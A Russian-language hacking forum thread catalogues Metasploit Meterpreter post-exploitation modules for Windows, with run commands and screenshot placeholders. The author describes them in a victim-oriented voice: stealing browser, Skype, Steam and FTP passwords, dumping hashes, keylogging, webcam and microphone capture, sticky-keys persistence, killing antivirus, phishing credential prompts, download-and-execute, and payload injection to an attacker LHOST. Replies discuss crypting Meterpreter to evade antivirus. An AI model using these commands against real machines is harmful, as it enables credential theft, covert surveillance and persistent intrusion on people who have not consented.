• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Meterpreter(Metasploit) - Windows модули

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
15
Здравия желаю, дамы господа. О чём поговорим сегодня? МЕТЕРПРЕТЕР
Для тех кто не вкурсе это очень большой шеллкод с кучей возможностей и сегодня мы рассмотрим, что умеет метерпретер для Windows машин.
Так же отсылаю Вас в свою тему про метасплоит где Вы познакомитесь с некоторыми общими понятиями.
Ну что?!Поехали?!
Итак, мы получили сессию и что дальше нам надо сделать с помощью могучего метерпретера?!
Для начала перечислим списком модули, которые будем рассматривать. Для удобного поиска тем, кто будет обращаться к этому топику.
  • run post/windows/gather/enum_devices - получить список установленных устройств;
  • run post/multi/gather/check_malware проверить файл на VIRUS TOTAL'е
  • run post/windows/gather/enum_dirperms найти привилегированные пути в Windows
  • run post/windows/gather/enum_domain – перечислить все доступные домены в Active Directory
  • run post/multi/gather/dns_bruteforce – хотим побрутить домен используя чужие ресурсы? Ноу проблемо эта опция для вас.
  • run post/multi/gather/dns_reverse_lookup - Вы станете днс сервером для Вашего клиента. Соотсветственно можно манипулировать службами DNS.
  • run post/windows/gather/enum_domain_tokens - Воруем токены авторизованных пользователей в Windows
  • run post/multi/gather/enum_vbox - чекаем на наличие Virtual Box машины
  • run post/windows/gather/enum_domains – получить список доменов
  • run post/multi/gather/env – получить переменные окружения полезно так же при эскалациях.
  • run post/multi/gather/filezilla_client_cred – Из моих любимых выдернуть пароли из файлзиллы
  • run post/windows/gather/enum_files – собирает различные конфиги и дат файлы полезная опция при ресерче жертвы
  • run post/multi/gather/find_vmx – получить список всех виртуальных машин
  • run post/windows/gather/enum_hostfile читаем hosts файл
  • run post/multi/gather/firefox_creds крадем пароли из firefox
  • run post/windows/gather/enum_ie – так же для ie
  • run post/windows/gather/enum_ms_product_keys – Воруем ключики лицензий
  • run post/multi/gather/ping_sweep – пингуем хосты
  • run post/windows/gather/enum_powershell_env – получить переменные окружения powershell
  • run post/multi/gather/run_console_rc_file – запустить в консоли rc файл
  • run post/windows/gather/enum_proxy – чекаем на прокси сервер (актуально чаще для организаций)
  • run post/multi/gather/skype_enum – Получить СКАЙП ПАРОЛИ
  • run post/windows/gather/enum_putty_saved_sessions – получаем сессии в PUTTY (SSH)
  • run post/multi/gather/thunderbird_creds – получить пароли с почтового клиента
  • run post/windows/gather/enum_services – получить список сервисов запущенных на машине. Удобно отследить сервисы.
  • run post/multi/gather/wlan_geolocate – узнать локацию интерфейса wlan
  • run post/windows/gather/enum_shares – получить список общих дисков
  • run post/multi/general/close – закрыть сессию метерпретер
  • run post/windows/gather/enum_snmp – чекаем на snmp
  • run post/multi/general/execute(аналог execute) – выполнить cmd команду в консоли жертвы
  • run post/windows/gather/enum_termserv – получить список серверов к которым коннектилась жертва
  • run post/windows/gather/enum_tokens – перечислить токено - залогиненных пользователей в системе
  • run post/windows/gather/enum_trusted_locations – получить интересные пути к файлам
  • run post/multi/manage/play_youtube – запустить видео в ютуб
  • run post/multi/manage/record_mic – запись звука с микрофона. Параметр задает время записи
  • run post/multi/manage/set_wallpaper – установить СВОИ обои
  • run post/windows/gather/forensics/duqu_check – проверить на уязвимость в Word при замене параметра Trueype
  • run post/multi/recon/local_exploit_suggester – прочекать систему на некоторые сплоиты
  • run post/windows/gather/forensics/enum_drives - перечисление драйверов работает криво
  • run post/windows/capture/keylog_recorder – классный кейлоггер
  • run post/windows/capture/lockout_keylogger ещё кейлоггер по мощнее
  • run post/windows/escalate/droplnk - создает вредный ярлычок, который если жертва запустит получим админа работает до win7
  • run post/windows/gather/hashdump – получить хэши паролей
  • run post/windows/escalate/getsystem – стандартная повышалка привелегий, работает очень редко
  • run post/windows/escalate/golden_ticket - отличный способ эскалации в доменах
  • run post/windows/escalate/ms10_073_kbdlayout – ещё один способ эскалации эксплоит до win7
  • run post/windows/escalate/screen_unlock - залочить текущий момнитор
  • run post/windows/gather/memory_grep – поиск утечет памяти в процессе
  • run post/windows/gather/ad_to_sqlite – Вся информация об Active directory в базу
  • run post/windows/gather/bitcoin_jacker – очень повезёт если схватите тачку на которой майнят биткоины
  • run post/windows/gather/phish_windows_credentials – фишинговая форма входа на powershell после ввода пасса отдаёт обратно хакеру.
  • run post/windows/gather/checkvm - проверить не на виртуалке ли мы.
  • run post/windows/gather/screen_spy – типа скриншотера, делает 1 скрин в секунду и создается иллюзия наблюдения за столом
  • run post/windows/gather/smart_hashdump если не работает хэшдамп можно попробовать
  • run post/windows/gather/credentials/bulletproof_ftp – парольчики с этого клиента
  • run post/windows/gather/tcpnetstat – получаем аналог команды netstat
  • run post/windows/gather/usb_history – Информация о флешках побывавших в компьютере и устройствах
  • run post/windows/gather/win_privs – Права текущего пользователя
  • run post/windows/gather/credentials/domain_hashdump - получить хэшик группы в адешке
  • run post/windows/gather/credentials/enum_cred_store – пытаемся брутфорснуть креды пользователей
  • run post/windows/gather/credentials/enum_cred_store – пытаемся брутфорснуть креды пользователей
  • run post/windows/manage/add_user_domain –Добавляем пользователя в домен
  • run post/windows/manage/autoroute – хотим начать хекать хосты на нашей атакованной машине, так проложить маршруты надо сначала
  • run post/windows/gather/credentials/enum_picasa_pwds воруем пароли от пикасы, надо мигрировать в explorer
  • run post/windows/gather/credentials/filezilla_server – чекаем на наличие файлзиллы
  • run post/windows/manage/delete_user – удалить пользователя
  • run post/windows/manage/download_exec – скачать и запустить
  • run post/windows/manage/enable_rdp включаем РДПшечку
  • run post/windows/gather/credentials/gpp - получаем групповые политики в домене
  • run post/windows/manage/enable_support_account – открыть саппорт аккаунт
  • run post/windows/gather/credentials/heidisql – получить паролики от Heidi
  • run post/windows/manage/exec_powershell моя любимая фитчка, выполнить ps команду
  • run post/windows/manage/forward_pageant – пропускаем ssh через себя
  • run post/windows/manage/inject_ca – очень классная фитча позволяет внедрить свой са сертификат и имея у себя приватный и публичный ключ расшифровывать SSL трафик.
  • run post/windows/manage/inject_host - внедрить host в файл hosts
  • run post/windows/manage/killav попытка задушить популярные процессы
  • run post/windows/manage/migrate – мигрировать в процесс, скрывает процесс шелкода, а так же позволяет повысить привилегии и закрепиться. Многие фитчи не работают из другого процесса.
  • run post/windows/manage/multi_meterpreter_inject – очень полезная фитча, когда нужно внедрить другой payload например выше разрядностью
  • run post/windows/gather/credentials/outlook – получить список конфигов в outlook
  • run post/windows/manage/payload_inject - аналогично multi_meterpreter_inject но как видно из названий ОС зависимый.
  • run post/windows/gather/credentials/skype - украсть пароли в скайп
  • run post/windows/manage/powershell/build_net_code – Скомпилировать .Net файл с помощью компилятора powershell, очень удобно чтобы пробросить свой код на C#.
  • run post/windows/manage/powershell/exec_powershell – хотим выполнить ps команду не проблема. По умолчанию валит ошибку но команду все равно выполняет
  • run post/windows/manage/priv_migrate – ЭСКАЛАЦИЯ пытается мигрировать в привилегированный процесс, что после миграции дает права пользователя с бОльшими
    привилегиями.
  • run post/windows/gather/credentials/steamВОРУЕЕЕМ ПАРОЛИИ СТИИИИМММ
  • run post/windows/gather/credentials/tortoisesvn – пытаемся вытянуть конфиги к репам из известного клиента SVN Turtoise
  • run post/windows/manage/reflective_dll_inject – DLL Инъекция в процесс. Путь к DLL и процессу куда инжектим DLLку, об этом я писал статью здесь
  • run post/windows/manage/remove_ca – удалить са поможет для того чтобы сломать ssl и выпустить новый
  • run post/windows/gather/credentials/vnc – получить креды от vnc
  • run post/windows/manage/rpcapd_start - пишем траффик с удаленной тачки
  • run post/windows/gather/credentials/windows_autologin – получить креды автологина очень часто используется.
  • run post/windows/manage/sticky_keys – ОТЛИЧНЫЙ ПЕРСИСТЕНС срабатывает когда нажат SHIFT 5 раз или горячие клавиши с WINDOWS
  • run post/windows/manage/wdigest_caching – фитча, с помощью которой, мы можем получить пароли пользователя плейнтекстом с помощью mimikatz
  • run post/windows/manage/webcam Сфоткаемся? ;)
    > webcam_snap -i 1 -v false Я обычно юзаю так
  • run post/windows/gather/enum_applications – получить список установленных тулз
  • run post/windows/gather/enum_av_excluded – получения программы в исключениях антивируса удобно для миграции и ав бйпасса.
  • run post/windows/gather/enum_chrome а вот об этом я подробно писал тут
  • run post/windows/gather/enum_db – Установленные базы данных
Теперь Скриншотики
run post/windows/gather/enum_devices
upload_2017-3-5_23-50-15.png

Результат:
upload_2017-3-5_23-50-38.png


run post/multi/gather/check_malware REMOTEFILE=c:\\windows\\system32\\cmd.exe
upload_2017-3-5_23-51-25.png


run post/windows/gather/enum_dirperms
upload_2017-3-5_23-51-41.png


run post/multi/gather/dns_bruteforce DOMAIN=
upload_2017-3-5_23-51-59.png


run post/multi/gather/enum_vbox
upload_2017-3-5_23-52-28.png


run post/windows/gather/enum_domains
upload_2017-3-5_23-52-46.png


run post/multi/gather/env
upload_2017-3-5_23-52-57.png


run post/multi/gather/filezilla_client_cred
upload_2017-3-5_23-53-10.png


run post/windows/gather/enum_files
upload_2017-3-5_23-53-22.png


run post/multi/gather/find_vmx
upload_2017-3-5_23-53-34.png


run post/windows/gather/enum_hostfile
upload_2017-3-5_23-53-57.png


run post/multi/gather/firefox_creds
upload_2017-3-5_23-54-14.png


run post/windows/gather/enum_ie
upload_2017-3-5_23-54-25.png


run post/windows/gather/enum_powershell_env
upload_2017-3-5_23-54-46.png


run post/multi/gather/run_console_rc_file
upload_2017-3-5_23-55-7.png


run post/windows/gather/enum_proxy
upload_2017-3-5_23-55-22.png


run post/windows/gather/enum_putty_saved_sessions
upload_2017-3-5_23-55-34.png


run post/windows/gather/enum_services
upload_2017-3-5_23-55-51.png


run post/multi/gather/wlan_geolocate
upload_2017-3-5_23-56-1.png


run post/windows/gather/enum_shares
upload_2017-3-5_23-56-9.png


run post/multi/general/execute
upload_2017-3-5_23-56-20.png


run post/windows/gather/enum_termserv
upload_2017-3-5_23-56-29.png


run post/windows/gather/enum_trusted_locations
upload_2017-3-5_23-56-48.png


run post/multi/manage/play_youtube
upload_2017-3-5_23-56-59.png


run post/multi/manage/record_mic
upload_2017-3-5_23-57-7.png


run post/windows/gather/forensics/browser_history
upload_2017-3-5_23-57-20.png


run post/windows/gather/forensics/duqu_check
upload_2017-3-5_23-57-30.png


run post/multi/recon/local_exploit_suggester
upload_2017-3-5_23-57-38.png


run post/windows/gather/forensics/enum_drives
upload_2017-3-5_23-57-46.png





 
Последнее редактирование:

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
15
run post/windows/capture/keylog_recorder
upload_2017-3-5_23-58-40.png

Результат
upload_2017-3-5_23-58-45.png


run post/windows/gather/forensics/recovery_files
upload_2017-3-5_23-59-14.png


run post/windows/escalate/droplnk
upload_2017-3-5_23-59-22.png


run post/windows/gather/hashdump
upload_2017-3-5_23-59-36.png


run post/windows/escalate/getsystem
upload_2017-3-5_23-59-46.png


run post/windows/gather/phish_windows_credentials
upload_2017-3-6_0-1-4.png


run post/windows/gather/checkvm
upload_2017-3-6_0-1-33.png


run post/windows/gather/screen_spy
upload_2017-3-6_0-1-43.png


run post/windows/gather/tcpnetstat
upload_2017-3-6_0-1-56.png


run post/windows/gather/credentials/coreftp
upload_2017-3-6_0-2-13.png


run post/windows/gather/usb_history
upload_2017-3-6_0-2-37.png


run post/windows/gather/win_privs
upload_2017-3-6_0-2-46.png


run post/windows/gather/credentials/domain_hashdump
upload_2017-3-6_0-2-56.png


run post/windows/gather/credentials/enum_cred_store
upload_2017-3-6_0-3-6.png


run post/windows/manage/add_user_domain
upload_2017-3-6_0-3-18.png


run post/windows/manage/autoroute
upload_2017-3-6_0-3-28.png


run post/windows/gather/credentials/enum_picasa_pwds
upload_2017-3-6_0-3-39.png


run post/windows/gather/credentials/filezilla_server
upload_2017-3-6_0-3-49.png


run post/windows/manage/download_exec URL= EXECUTE=true
upload_2017-3-6_0-4-12.png


run post/windows/gather/credentials/gpp
upload_2017-3-6_0-4-23.png


run post/windows/manage/exec_powershell
upload_2017-3-6_0-4-42.png


run post/windows/manage/forward_pageant
upload_2017-3-6_0-4-52.png


run post/windows/manage/inject_host DOMAIN= IP=87.240.165.82
upload_2017-3-6_0-5-9.png


run post/windows/manage/killav
upload_2017-3-6_0-5-20.png


run post/windows/manage/migrate
upload_2017-3-6_0-5-29.png


run post/windows/manage/multi_meterpreter_inject
upload_2017-3-6_0-5-38.png


run post/windows/gather/credentials/outlook
upload_2017-3-6_0-6-3.png


run post/windows/manage/payload_inject LHOST=192.168.1.237 LPORT=1341
upload_2017-3-6_0-6-18.png


run post/windows/gather/credentials/skype
upload_2017-3-6_0-6-33.png







 

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
15
run post/windows/manage/powershell/exec_powershell
upload_2017-3-6_0-7-29.png

Результат:
upload_2017-3-6_0-7-39.png
\

run post/windows/manage/priv_migrate
upload_2017-3-6_0-7-52.png

Результат:
upload_2017-3-6_0-8-2.png


run post/windows/gather/credentials/tortoisesvn
upload_2017-3-6_0-8-19.png


run post/windows/manage/sticky_keys
upload_2017-3-6_0-8-39.png


run post/windows/manage/wdigest_caching
upload_2017-3-6_0-8-49.png


run post/windows/gather/enum_applications
upload_2017-3-6_0-8-58.png


run post/windows/gather/enum_av_excluded
upload_2017-3-6_0-9-7.png


run post/windows/gather/enum_db
upload_2017-3-6_0-9-14.png


Post interrupted by the console user – увидели такую ошибку используйте вместо опции
run use или попробуйте мигрировать в процесс
 

Pushkinmazila

Green Team
20.11.2016
34
26
BIT
0
Я думаю что нам следует как то собрать все статьи про мертерсплоит не просто в одну тему а как то еще
Наверное следует их обьединить и сделать что то на подобии книги или журнала но в формате веб страницы
Как те страницы с переводом
 
  • Нравится
Реакции: Mokh, Leon и citizen2517

Сергей Попов

Кодебай
30.12.2015
4 690
6 580
BIT
268
Я думаю что нам следует как то собрать все статьи про мертерсплоит не просто в одну тему а как то еще
Наверное следует их обьединить и сделать что то на подобии книги или журнала но в формате веб страницы
Как те страницы с переводом
Объединять ничего не будем. Лучшее решение - создать отдельную тему-оглавление. Возьметесь ? :)
 

Петручо

Green Team
27.11.2016
115
12
BIT
0
вот это шикарное описание ряда модулей .
в связи с этим у меня пара вопросов , первый вообще детский на счет метерпретера . как я понял он широко применяется , а значит уже должен быть на заметке у аверов , поэтому насколько часто аверы его палят , можно ли его криптовать и как он будет вести себя после крипта .
и второй вопрос чисто автору статьи - Вы не планируете сделать описание модулей для Империи ?
 

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
15
вот это шикарное описание ряда модулей .
в связи с этим у меня пара вопросов , первый вообще детский на счет метерпретера . как я понял он широко применяется , а значит уже должен быть на заметке у аверов , поэтому насколько часто аверы его палят , можно ли его криптовать и как он будет вести себя после крипта .
и второй вопрос чисто автору статьи - Вы не планируете сделать описание модулей для Империи ?
Empire - Возможно в будущем, сейчас в планах mimikatz
По поводу крипты, метерпретер - это шелкод, его доставка уже на твоей совести. Один из вариантов крипты можно почитать в моей статье AV Bypass с помощью C#
 
  • Нравится
Реакции: Mokh и citizen2517

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 997
BIT
1
Брат (чуть по имени не обратился) ,ты как всегда крут , с лёгкой руки , с глубоких познаний ,своеобразную энциклопедию запостил.Буду этим мануалом , как настольной книгой пользоваться с удовольствием.
 
U

Unrulyguy

Спасибо за пост. Вопрос: есть статья как получить эту самую сессию через метасплойт?
 
  • Нравится
Реакции: Mokh и citizen2517

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
15
любой сплойт мне даст доступ на таргет и там я уже смогу поднять права. Так?
Тут ключевая фраза "Успешная экспулатация", то есть сплоитов сотни тысяч. Тебе надо использовать под свою конкретную цель. А чтобы поднять права есть свои сплоиты, они находятся в разделе escalation. Но как правило эскалация привелегий не всегда выполнимо с помощью команды "use exploit"
 
  • Нравится
Реакции: Mokh и citizen2517
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!